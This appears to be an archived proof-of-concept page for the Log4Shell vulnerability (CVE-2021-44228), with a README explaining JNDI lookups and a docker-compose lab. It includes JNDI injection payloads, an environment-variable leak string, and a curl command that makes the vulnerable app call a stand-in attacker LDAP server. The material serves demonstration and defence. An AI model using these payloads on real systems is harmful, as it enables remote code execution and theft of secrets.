Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/alpacamybags118/log4j-cve-2021-44228-sample
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Sample docker-compose setup to show how this exploit works
Readme
# Example of log4j exploit

This repo has a working sample of abusing the recent [log4j exploit](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance). It does not perform actual remote code execution, but shows you the ease at which a bad actor can have a vulnerable application call out to its own ldap server.

This uses the excellent log4j sample vulnerable app created christophetd: https://github.com/christophetd/log4shell-vulnerable-app

## Explanation

This vulnerability abuses the `lookup` functionality of log4j, specially the `jndi` which allows log4j to perform lookups from external hosts for data to input. This can be exploited to do anything from logging sensitive variables in the environment to executing code remotely.

Lookups are done for any text wrapped in `${}` when the logger is called. For example,

```
${jndi:ldap://someldapserver:1389/o=example}
```
would do a lookup on that LDAP server with the given query and output the result.

A more simple example that doesnt make use of jndi, but is still dangerous:

```
${env:PASSWORD}
```

This would print the contents of that environment variable into logs. Someone then with access to view those logs could extract sensitive data from the application.

## log4j Code

The code in log4j for this exploit to be abused is pretty straightforward. You just need to call the logger to log a given request property unsanitized. For example, you could log the contents of a `User-Agent`.

```
...
@GetMapping("/bad")
	public void Bad(@RequestHeader("User-Agent") String userAgent) {
    logger.info("Received User-Agent header " + userAgent);
	}
```

## Using this example

First, build the local ldap server:

```
docker build -t ldapnode .
```

Once built, bring up the whole stack by running

```
docker-compose up
```

Then, you can perform a request to the app, using the `x-api-version` header to inject the lookup

```
curl --request GET \
  --url http://localhost:8080/ \
  --header 'x-api-version: ${jndi:ldap://bad:1389/o=example}'
```

Using that request, you will see in the docker-compose logs, the ldap server will have been called:

```
bad_1    | ldap server has been called!
log4j_1  | 2021-12-14 02:43:11.657  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version com.sun.jndi.ldap.LdapCtx@201a609c
```

## What to do if you are impacted

Please see [this documentation](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance) for resolution paths
File Snapshot

 [4.0K]  /data/pocs/a5badb99e4837ede43bb8aeab5289a2fdb41db4c
├── [ 227]  docker-compose.yml
├── [  82]  Dockerfile
├── [ 272]  index.js
├── [ 294]  package.json
├── [8.9K]  package-lock.json
└── [2.5K]  README.md

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.